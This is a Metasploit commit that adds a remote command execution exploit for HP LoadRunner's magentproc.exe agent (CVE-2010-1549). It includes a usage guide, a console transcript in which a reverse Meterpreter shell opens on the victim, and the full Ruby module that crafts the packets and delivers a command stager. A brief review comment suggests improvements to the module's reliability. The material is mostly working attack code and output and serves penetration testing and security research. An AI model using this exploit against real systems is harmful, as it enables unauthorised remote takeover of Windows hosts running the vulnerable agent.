Land #9191, an exploit against HP LoadRunner magentproc

This commit is contained in:
h00die 2017-12-29 16:35:43 -05:00
commit 3516305517
No known key found for this signature in database
GPG Key ID: C5A9D25D1457C971
2 changed files with 162 additions and 0 deletions

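--- /dev/null
+++ b/documentation/modules/exploit/windows/misc/hp_loadrunner_magentproc_cmdexec.md
@@ -0,0 +1,63 @@
+HP Mercury LoadRunner Agent magentproc.exe Remote Command Execution (CVE-2010-1549)
+This module exploits a remote command execution vulnerablity in HP LoadRunner before 9.50 and also
+HP Performance Center before 9.50. By sending a specially crafted packet, an attacker can execute commands remotely.
+The service is vulnerable provided the Secure Channel feature is disabled (default).
+During testing, additional versions were verified to be vulnerable. The following list documents them:
+- HP LoadRunner 12.53 Community Edition (non-default SSL turned off)
+## Vulnerable Application
+HP LoadRunner 9.50 or below, or a version documented above.
+## Verification Steps
+1. Install the application
+2. Start msfconsole
+3. Do: ```use exploit/windows/misc/hp_loadrunner_magentproc_cmdexec```
+4. Do: ```set RHOST [ip]```
+5. Do: ```run```
+6. You should get a shell.
+## Scenarios
+### Win7 OS with HP LoadRunner 12.53 Community Edition
+```
+msf > use exploit/windows/misc/hp_loadrunner_magentproc_cmdexec
+msf exploit(hp_loadrunner_magentproc_cmdexec) > set RHOST victim
+RHOST => victim
+msf exploit(hp_loadrunner_magentproc_cmdexec) > exploit
+[*] Started reverse TCP handler on 1.1.1.1:4444
+[*] victim:54345 - Sending payload...
+[*] victim:54345 - Command Stager progress - 1.47% done (1499/102292 bytes)
+[*] victim:54345 - Command Stager progress - 2.93% done (2998/102292 bytes)
+[*] victim:54345 - Command Stager progress - 4.40% done (4497/102292 bytes)
+[*] victim:54345 - Command Stager progress - 5.86% done (5996/102292 bytes)
+[*] victim:54345 - Command Stager progress - 7.33% done (7495/102292 bytes)
+...snip...
+[*] victim:54345 - Command Stager progress - 92.32% done (94437/102292 bytes)
+[*] victim:54345 - Command Stager progress - 93.79% done (95936/102292 bytes)
+[*] victim:54345 - Command Stager progress - 95.25% done (97435/102292 bytes)
+[*] victim:54345 - Command Stager progress - 96.72% done (98934/102292 bytes)
+[*] victim:54345 - Command Stager progress - 98.15% done (100400/102292 bytes)
+[*] victim:54345 - Command Stager progress - 99.55% done (101827/102292 bytes)
+[*] victim:54345 - Command Stager progress - 100.00% done (102292/102292 bytes)
+[*] Sending stage (179267 bytes) to 2.2.2.2
+[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:55556) at 2017-11-09 03:53:08 +1100
+meterpreter > sysinfo
+Computer : TARGET
+OS : Windows 7 (Build 7601, Service Pack 1).
+Architecture : x64
+System Language : en_AU
+Domain : DOMAIN
+Logged On Users : 3
+Meterpreter : x86/windows
+meterpreter >
+Background session 1? [y/N]
+```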

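--- /dev/null
+++ b/modules/exploits/windows/misc/hp_loadrunner_magentproc_cmdexec.rb
@@ -0,0 +1,99 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+class MetasploitModule < Msf::Exploit::Remote
+Rank = ExcellentRanking
+include Msf::Exploit::Remote::Tcp
+include Msf::Exploit::CmdStager
+def initialize(info={})
+super(update_info(info,
+'Name' => "HP Mercury LoadRunner Agent magentproc.exe Remote Command Execution",
+'Description' => %q{
+This module exploits a remote command execution vulnerablity in HP LoadRunner before 9.50
+and also HP Performance Center before 9.50. HP LoadRunner 12.53 and other versions are
+also most likely vulneable if the (non-default) SSL option is turned off.
+By sending a specially crafted packet, an attacker can execute commands remotely.
+The service is vulnerable provided the Secure Channel feature is disabled (default).
+},
+'License' => MSF_LICENSE,
+'Author' =>
+[
+'Unknown', # Original discovery # From Tenable Network Security
+'aushack' # metasploit module
+],
+'References' =>
+[
+['CVE', '2010-1549'],
+['ZDI', '10-080'],
+['BID', '39965'],
+['URL', 'https://support.hpe.com/hpsc/doc/public/display?docId=c00912968']
+],
+'Payload' => { 'BadChars' => "\x0d\x0a\x00" },
+'Platform' => 'win',
+'Targets' =>
+[
+# Note: software reportedly supports Linux - may also be vulnerable.
+['Windows (Dropper)',
+'Platform' => 'win',
+'Arch' => [ARCH_X86, ARCH_X64]
+],
+],
+'Privileged' => false,
+'Stance' => Msf::Exploit::Stance::Aggressive,
+'DisclosureDate' => 'May 06 2010',
+'DefaultTarget' => 0))
+register_options([Opt::RPORT(54345)])
+end
+def autofilter
+true
+end
+def execute_command(cmd, _opts = {})
+guid = Rex::Text.encode_base64(Rex::Text.rand_text_alphanumeric(17))
+randstr = Rex::Text.rand_text_alpha(16)
+server_name = Rex::Text.rand_text_alpha(7)
+server_ip = datastore['LHOST']
+server_port = Rex::Text.rand_text_numeric(4)
+# If linux is one day supported, cmd1 = /bin/sh and cmd2 = -c cmd
+cmd1 = "C:\\Windows\\system32\\cmd.exe"
+cmd2 = "/C \"#{cmd}\""
+pkt1 = [0x19].pack('N') + guid + '0'
+pkt2 = [0x6].pack('N') + [0x0].pack('N') + "(-server_type=8)(-server_name=#{server_name})(-server_full_name=#{server_name})"
+pkt2 << "(-server_ip_name=#{server_ip})(-server_port=#{server_port})(-server_fd_secondary=4)(-guid_identifier=#{guid})\x00\x00"
+pkt2 << [0x7530].pack('N')
+pkt3 = [4 + pkt2.length].pack('N') + pkt2
+pkt4 = [0x1c].pack('N') + [0x05].pack('N') + [0x01].pack('N') + randstr + pkt3
+pkt5 = [pkt4.length].pack('N') + pkt4
+pkt6 = [0x437].pack('N') + [0x0].pack('N') + [0x31].pack('N') + [1].pack('N') + [0x31000000].pack('N')
+pkt6 << [cmd1.length].pack('N') + cmd1 + "\x00" + [cmd2.length].pack('N') + cmd2 + [0x0].pack('N') + [0x0].pack('N')
+pkt7 = [4 + pkt6.length].pack('N') + pkt6
+pkt8 = [0x18].pack('N') + [0x04].pack('N') + randstr + pkt7
+pkt9 = [pkt8.length].pack('N') + pkt8
+sploit = pkt1 + pkt5 + pkt9
+connect
+sock.put(sploit)
+disconnect
+end
+def exploit
+print_status('Sending payload...')
+execute_cmdstager(linemax: 1500)
+end
+end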
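Review bot: execute_command sends blindly — `sock.put(sploit)` is followed straight away by `disconnect` with nothing read back — so when the agent has Secure Channel/SSL enabled, or RPORT belongs to something else, the stager still streams all ~100 KB of commands over dozens of connections and the only failure signal is a missing session. If the agent answers the first message at all (presumably it does, but that is not visible here), reading a reply on the first stager call and raising `fail_with(Failure::UnexpectedReply, 'No response from magentproc - Secure Channel may be enabled')` would give an early, attributable error, and a `check` method built from the same exchange would make the "SSL off" precondition in the description testable rather than assumed. Separately, `server_ip = datastore['LHOST']` is nil when a bind payload is selected (LHOST is then not a registered option), so the packet carries an empty `(-server_ip_name=)`; since server_port is random the field looks like filler, so `server_ip = datastore['LHOST'] || Rex::Socket.source_address(rhost)` removes the dependency on the payload's options without changing the packet shape.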